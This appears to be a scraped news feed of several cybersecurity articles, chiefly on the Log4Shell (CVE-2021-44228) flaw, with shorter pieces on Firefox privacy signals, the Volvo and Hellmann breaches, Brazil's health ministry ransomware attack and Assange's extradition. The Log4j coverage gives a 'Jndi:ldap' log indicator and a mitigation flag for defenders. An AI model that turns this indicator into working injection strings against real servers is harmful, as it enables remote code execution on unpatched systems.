Information Technology

Cyber attackers are making over a hundred attempts to exploit a critical security vulnerability in Java logging library Apache Log4j every minute, security researchers have warned. The Log4j flaw (also now known as “Log4Shell”) is a zero-day vulnerability (CVE-2021-44228) that first came to light on December 9, with warnings that it can allow unauthenticated remote code execution and access to servers. Log4j is used in many forms of enterprise and open-source software, including cloud platforms, web applications and email services, meaning that there’s a wide range of software that could be at risk from attempts to exploit the vulnerability. Log4j flaw coverage – what you need to know now Attackers are already attempting to scan the internet for vulnerable instances of Log4j, with cybersecurity researchers at Check Point warning that there are over 100 attempts to exploit the vulnerability every minute. Meanwhile, cybersecurity researchers at Sophos have warned that they’ve detected hundreds of thousands of attempts to remotely execute code using the Log4j vulnerability in the days since it was publicly disclosed, along with scans searching for the vulnerability. There are already active examples of attackers attempting to leverage Log4j vulnerabilities to install cryptocurrency-mining malware, while there also reports of several botnets, including Mirai, Tsunami, and Kinsing, that are making attempts to leverage it. Researchers at Microsoft have also warned about attacks attempting to take advantage of Log4j vulnerabilities, including a range of cryptomining malware, as well as active attempts to install Cobalt Strike on vulnerable systems, something that could allow attackers to steal usernames and passwords.

It’s common for cyber criminals to make efforts to exploit newly disclosed vulnerabilities in order to have the best chance of taking advantage of them before they’re remediated – but in this case, the ubiquity of Log4j and the way many organisations may be unaware that it’s part of their network, means there could be a much larger window for attempts to scan for access. And while cyber criminals attempting to leverage Log4j vulnerabilities to install cryptomining malware might initially appear to be a relatively low level threat, it’s likely that higher level, more dangerous cyber attackers will attempt to follow.

ZDNet Recommends

“I cannot overstate the seriousness of this threat. On the face of it, this is aimed at cryptominers but we believe this creates just the sort of background noise that serious threat actors will try to exploit in order to attack a whole range of high-value targets such as banks, state security and critical infrastructure,” said Lotem Finkelstein, director of threat intelligence and research for Check Point. SEE: A winning strategy for cybersecurity (ZDNet special report) The severity of the vulnerability in such a widely used library means that organisations and technology vendors are being urged to counter the threat as soon as possible. “In the case of this vulnerability CVE-2021-44228, the most important aspect is to install the latest updates as soon as practicable,” said an alert by the UK’s National Cyber Security Centre (NCSC). While the Log4j security issue only recently came to light, evidence suggests that attackers have been exploiting the vulnerability for some time before it was publicly disclosed.
MORE ON CYBERSECURITY More

Image: Kevin Beaumont
The usage of the nasty vulnerability in the Java logging library Apache Log4j that allowed unauthenticated remote code execution could have kicked off as early as December 1.”Earliest evidence we’ve found so far of #Log4J exploit is 2021-12-01 04:36:50 UTC,” Cloudflare CEO Matthew Prince said on Twitter. “That suggests it was in the wild at least 9 days before publicly disclosed. However, don’t see evidence of mass exploitation until after public disclosure.” Cisco Talos said in a blog post that it observed activity for the vulnerability known as CVE-2021-44228 from December 2, and those looking for indicators of compromise should extend their searches to at least that far back. Thanks to the ubiquity of the impacted library, Talos said it was seeing lead time from attackers doing mass scanning to callbacks occurring, and could be due to vulnerable but non-targeted systems — such as SIEMs and log collectors — being triggered by the exploit. It added that the Mirai botnet was starting to use the vulnerability. Researchers at Netlab 360 said they had seen the Log4j vulnerability used to create Muhstik and Mirai botnets that went after Linux devices. Over the weekend, vendors have been rushing to get patches out and document workarounds for affected products. The end results have been product matrices such as those from VMware and Cisco where some products have patches available, some have workarounds, and others remain vulnerable. Both vendors scored CVE-2021-44228 as a perfect 10.

The suggested workarounds typically either set the log4j2.formatMsgNoLookups flag to true, or remove the JndiLookup class from the classpath used by Java. A Reddit post from NCC Group is being regularly updated, and shows how the exploit can be used to exfiltrate AWS secrets, as well as all manner of Java system properties. One security researcher was able to trigger the exploit by going Little Bobby Tables on his iPhone name. Sophos said it was seeing the vulnerability already being used by cryptominers. On the more enjoyable front, a Minecraft mod developer was able to use the vulnerability to turn a Minecraft server into one that played Doom instead. “For some context, this is an entirely vanilla client connecting to a modded server, which, through this exploit, is sending over and executing the code to run doom,” Gegy said. Microsoft threat analyst Kevin Beaumont said defence in depth was “probably your best option”. “To give a spoiler for Log4Shell, this is going to take weeks to play out to establish attack surface (it is large) and then maybe a month or more for patches to be made available,” he said. Related Coverage More

Mozilla has expanded its implementation of Global Privacy Control (GPC) to all users after rolling it out on a limited basis in October. The feature – which tells websites not to sell or share your personal data – was only available in Firefox Nightly, their pre-release channel. But as of this week, GPC will be available for all Firefox users to turn on if they wish to. Unfortunately for most US users, this feature may not have much effect. The GPC is required under the California Consumer Protection Act (CCPA) and Europe’s Global Data Protection Regulation (GDPR) as well as Colorado’s privacy law, but no other states have laws that will enforce it.Even California and Colorado have faced backlash for loopholes in their laws that make it difficult to actually enforce the feature. Mozilla told ZDNet that GPC complements technical anti-tracking features integrated into Firefox, like Enhanced Tracking Protection and Total Cookie Protection. “By sending a signal to the websites that people visit, telling them that the person does not want to be tracked and does not want their data to be sold, it helps address the tracking conducted by websites through first-party cookies,” Mozilla said in a statement. “We think it can play an integral role in making a right to opt-out meaningful and easy to use for consumers. GPC is getting traction both in California and in Colorado. Now that we expect websites to start honoring GPC, we want to start providing this option to Firefox users. Yet, the rules around the enforceability of GPC under the CCPA remain ambiguous and leave space for businesses to ignore the signal sent by the browser on behalf of consumers.” 

The company noted that last month, they shared feedback with the California Privacy Protection Agency, encouraging the California AG and other privacy agencies globally to expressly require businesses to comply with GPC.Jennifer Hodges, Mozilla’s head of US public policy, said the GPC signal is sent by Firefox to websites regardless of the state the user is in. “However, the GPC may not be enforceable in jurisdictions without privacy legislation that include do not sell provisions which allow for the GPC signal to act as a universal opt-out,” Hodges explained.”For someone in a state that does not have a privacy law, The GPC may not be enforceable. California and Colorado are two states that have GPC-like provisions at the moment.”Hodges said history has shown that without a clear legal mandate, most businesses will not comply with consumer opt-out signals sent through browsers. “This vacuum is the same reason that Do Not Track (“DNT”) failed to gain adoption. It was eventually removed by all major browsers because it created a false sense of consumer protection that could not be enforced,” Hodges added.  “The 2023 Colorado Privacy Law has taken this step, and the addition of California would pave the path for other global privacy regulators to similarly update their laws. In addition, we think that enforcement authorities should also expect businesses to interpret the GPC as governing both the direct sale of consumer’s information as well as the sharing of consumers’ information for programmatic advertising targeting purposes. Regulators, consistent with the intent of CCPA and CPRA, must step in to give tools like the GPC enforcement teeth and to ensure consumers’ choices are honored.” More

Volvo Cars has released a statement confirming a breach of sensitive files that resulted from a cyberattack.Volvo said it is now aware that “one of its file repositories has been illegally accessed by a third party.””Investigations so far confirm that a limited amount of the company’s R&D property has been stolen during the intrusion. Volvo Cars has earlier today concluded, based on information available, that there may be an impact on the company’s operation,” Volvo said in a statement. “After detecting the unauthorised access, the company immediately implemented security countermeasures including steps to prevent further access to its property and notified relevant authorities.” Volvo added that it is still in the process of investigating the incident and has hired a cybersecurity firm to help “investigate the property theft.” The attack did not have “an impact on the safety or security of its customers’ cars or their personal data,” the company noted in their statement. But they conditioned the statement by saying this was only based on their “currently available information.”Bleeping Computer reported that the Snatch ransomware group has claimed responsibility for the attack after adding the company to its leak site on November 30. The group already published a small portion of the documents they stole on their leak site. 

According to Sophos, the group has been active since 2018 and gained notoriety in 2019 for a novel trick where they were able to bypass antivirus software by rebooting an infected computer into Safe Mode and running the ransomware’s file encryption process from there.The group became known for buying access into victim networks and lurking for days and weeks, expanding their foothold in a company before initiating the ransomware process. The group also became well known as a ransomware gang that engaged in data theft in addition to encrypting victim networks. Erich Kron, security awareness advocate at KnowBe4, said most ransomware is spread through phishing emails or through exploiting RDP instances open to the internet, noting that this was a hallmark of Snatch. “The Snatch gang makes great use of RDP in infection and lateral movement within an organization. To defend against these attacks, organizations are wise to ensure employees are trained on the importance of using complex passwords and not reusing passwords with other accounts. Organizations should also be on high alert for brute force attempts against RDP,” Kron said.  More

A UK High Court has approved the extradition of WikiLeaks founder Julian Assange to the US. 

ZDNet Recommends

Assange has been wanted by US authorities since the early 2010s for his role in acquiring and disseminating military and diplomatic documents via the WikiLeaks website. Following a long stint at Ecuador’s embassy in London, he was finally arrested in 2019, when his asylum was revoked. He has been indicted on 18 criminal counts, including 17 espionage charges. The collective maximum sentence for all charges comes to 175 years, but the US government has indicated that the actual imprisonment would be far, far shorter. This decision follows an earlier ruling made in January 2021, which denied the US request based on the court’s perception that it posed too great a risk to Assange’s wellbeing. The judge forbade the extradition due to “a recurrent depressive disorder which was severe in December 2019 and sometimes accompanied by psychotic features (hallucinations), often with ruminative suicidal ideas.” The new ruling takes concerns over Assange’s mental health into account, but it also integrates a series of four “assurances” made by US officials. These include: a promise that Assange will never be held under any “special administrative measures”; a commitment to never house him within a maximum security prison; a guarantee that he will be allowed to serve his final sentence in his native Australia, if he wishes; and a commitment to provide him with “appropriate clinical and psychological treatment as recommended by a qualified treating clinician at the prison where he is held.” Assange’s fiancée, Stella Morris, was outraged by the decision, telling the UK’s Sky News that his legal counsel intended to appeal the decision “at the earliest possible moment.” She called the repeal a “grave miscarriage of justice,” asking how the UK could allow him to be sent to a country that “plotted to kill him.” This final accusation likely relates to reporting from earlier this year, which claims that the Trump administration explored the possibility of forcibly kidnapping or assassinating Assange in 2017. The US government has never officially commented on this report. Assange remains a controversial figure, with organizations like Amnesty International and individuals like Edward Snowden still calling for his release based on concerns over preserving freedom of speech and the arrest’s chilling effect on investigative journalism. The US government, however, has never wavered in its stance that the WikiLeaks founder’s actions were criminal in nature, putting lives at risk by divulging classified information to enemies of the US. 

Assange’s legal team now has 14 days to file their appeal, which will delay any extradition proceedings until that filing is subsequently resolved. 

Government More

Billion-dollar logistics firm Hellmann Worldwide Logistics reported a cyberattack this week that forced them to temporarily remove all connections to their central data center. The company said the shut down was having a “material impact” on their business operations. 

ZDNet Recommends

The German company operates in 173 countries, running logistics for a range of air and sea freights as well as rail and road transportation services. Air Cargo News, which first reported the attack, said the company had a revenue of nearly $3 billion last year.In a statement, Hellmann said its Global Crisis Taskforce discovered the attack but outside cybersecurity experts were brought in to help with the response. “Operations will be restored step by step, with the security and integrity of the systems as the top priority,” reads the statement.The statement does not say if they were suffering from a ransomware attack, and the company did not respond to requests for comment. This is a particularly inopportune time for a global logistics firm like Hellmann to suffer from a cyberattack considering the role it plays in the global supply chain, explained Nasser Fattah, North America steering committee chair at Shared Assessments.  “Today, the movement of goods is a global process that requires a concerted effort because the supply chain may include transportation, shipping, receiving, storage, and management of goods,” Fattah said. 

“The slightest kink in the chain can cause the business to suffer simply because of untimely deliveries. And businesses know that implementing seamless logistics is essential to keep pace with customer demands and remain competitive.” More

Websites under Brazil’s Ministry of Health (MoH) have suffered a major ransomware attack that resulted in the unavailability of COVID-19 vaccination data of millions of citizens. Following that attack that took place at around 1 am today, all of MoH’s websites including ConecteSUS, which tracks the trajectory of citizens in the public healthcare system, became unavailable. This includes the COVID-19 digital vaccination certificate, which is available via the ConecteSUS app.

According to a message left by the Lapsus$ Group, which has claimed responsibility for the attack, some 50 TB worth of data has been extracted from the MoH’s systems and subsequently deleted. “Contact us if you want the data returned”, the message said, alongside contact details for the authors of the attack. Just before 7 am, the images with the message left by the hackers were removed, but the websites remained unavailable. The image left by the hackers claiming the Ministry of Health attack Contacted by ZDNet about the measures in place to mitigate the attack and reestablish the systems, and whether there are backups for the data allegedly stolen from its systems, the Ministry of Health has not returned requests for comment at the time of writing. The incident follows a previous attack on the Brazilian Health Regulatory Agency (Anvisa) in September. The attack was focused on the healthcare declaration for travelers, compulsory for individuals entering Brazil via airports. The attack took place soon after the cancellation of the World Cup qualifier match between Brazil and Argentina, whereby Anvisa interrupted the game after four Argentinian players were accused of breaking COVID-19 travel protocols.

Similarly, the latest issue faced by the Ministry of Health occurs amid increasing pressure on the Brazilian government to demand COVID-19 vaccination certificates from international travelers coming to Brazil, as a response to the rise of the omicron variant. This is not the first major security issue faced by Brazil’s Ministry of Health over the last few months. In November 2020, personal and health information of more than 16 million Brazilian COVID-19 patients were leaked online after a hospital employee uploaded a spreadsheet with usernames, passwords, and access keys to sensitive government systems on GitHub. Less than a week later, another major security incident emerged. The personal information of more than 243 million Brazilians, including alive and deceased, was exposed online after web developers left the password for a crucial government database inside the source code of an official MoH website for at least six months.

ZDNet Recommends More

A newly discovered zero-day vulnerability in the widely used Java logging library Apache Log4j is easy to exploit and enables attackers to gain full control of affected servers. Tracked as CVE-2021-44228, the vulnerability is classed as severe and allows unauthenticated remote code execution as the user running the application utilises the Java logging library. CERT New Zealand warns that it’s already being exploited in the wild.CISA has urged users and administrators to apply the recommended mitigations “immediately” in order to address the critical vulnerabilities. 

ZDNet Recommends

Systems and services that use the Java logging library, Apache Log4j between versions 2.0 and 2.14.1 are all affected, including many services and applications written in Java. SEE: A winning strategy for cybersecurity (ZDNet special report) The vulnerability was first discovered in Minecraft but researchers warn that cloud applications are also vulnerable. It’s also used in enterprise applications and it’s likely that many products will be found to be vulnerable as more is learned about the flaw. A blog post by researchers at LunaSec warns that anybody using Apache Struts is “likely vulnerable.”

LunaSec said: “Given how ubiquitous this library is, the impact of the exploit (full server control), and how easy it is to exploit, the impact of this vulnerability is quite severe. We’re calling it “Log4Shell” for short.” Organisations can identify if they’re affected by examining the log files for any services using affected Log4j versions. If they contain user-controlled strings, CERT-NZ uses the example of “Jndi:ldap”, they could be affected. In order to mitigate vulnerabilities, users should switch log4j2.formatMsgNoLookups to true by adding:”‐Dlog4j2.formatMsgNoLookups=True” to the JVM command for starting the application. To prevent the library being exploited, it’s urgently recommended that Log4j versions are upgraded to log4j-2.15.0-rc1. “If you believe you may be impacted by CVE-2021-44228, Randori encourages all organizations to adopt an assumed breach mentality and review logs for impacted applications for unusual activity,” cybersecurity researchers at Randori wrote in a blog post. “If anomalies are found, we encourage you to assume this is an active incident, that you have been compromised and respond accordingly.”
MORE ON CYBERSECURITY More